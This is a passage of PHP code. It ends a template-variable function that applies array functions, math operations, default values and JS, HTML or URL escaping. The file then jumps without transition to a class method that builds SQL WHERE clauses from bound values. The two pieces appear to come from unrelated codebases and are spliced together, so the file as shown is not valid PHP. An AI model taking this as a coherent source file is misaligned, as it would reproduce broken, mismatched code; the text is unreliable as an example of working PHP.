} elseif ('count' == $func) {
$return_val = count($value);
} else {
return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for an array.", $func));
}
} else {
if (array_key_exists('to_json', $args) && $args['to_json']) {
if (function_exists('json_encode')) {
$return_val = json_encode($value);
} else {
$return_val = '';
}
}
}
}
if (array_key_exists('op', $args)) {
$op = $args['op'];
$rvalue = $args['value'];
if ($op && isset($value) && !is_array($value)) {
$return_val = _math_operation($op, $value, $rvalue);
if (!isset($return_val)) {
return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $value, $op, $rvalue));
}
}
}
}
if ($return_val == '') {
if (isset($args['default'])) {
$return_val = $args['default'];
}
}
if (isset($args['escape'])) {
$esc = strtolower($args['escape']);
if ($esc == 'js') {
$return_val = encode_js($return_val);
} elseif ($esc == 'html') {
if (version_compare(phpversion(), '4.3.0', '>=')) {
global $mt;
$charset = $mt->config('PublishCharset');
$return_val = htmlentities($return_val, ENT_COMPAT, $charset);
} else {
$return_val = htmlentities($return_val, ENT_COMPAT);
}
} elseif ($esc == 'url') {
$return_val = urlencode($return_val);
$return_val = preg_replace('/\\+/', '%20', $return_val);
}
}
return $return_val;
}
private function apply_where_conditions($args)
{
$num_args = count($args);
if ($num_args == 1 && is_hash($args[0])) {
$e = new Expressions($args[0]);
$e->set_connection($this->connection);
$this->where = $e->to_s();
$this->where_values = array_flatten($e->values());
} elseif ($num_args > 0) {
// if the values has a nested array then we'll need to use Expressions to expand the bind marker for us
$values = array_slice($args, 1);
foreach ($values as $name => &$value) {
if (is_array($value)) {
$e = new Expressions($args[0]);
$e->set_connection($this->connection);
$e->bind_values($values);
$this->where = $e->to_s();
$this->where_values = array_flatten($e->values());
return;
}
}
// no nested array so nothing special to do
$this->where = $args[0];
$this->where_values =& $values;
}
}
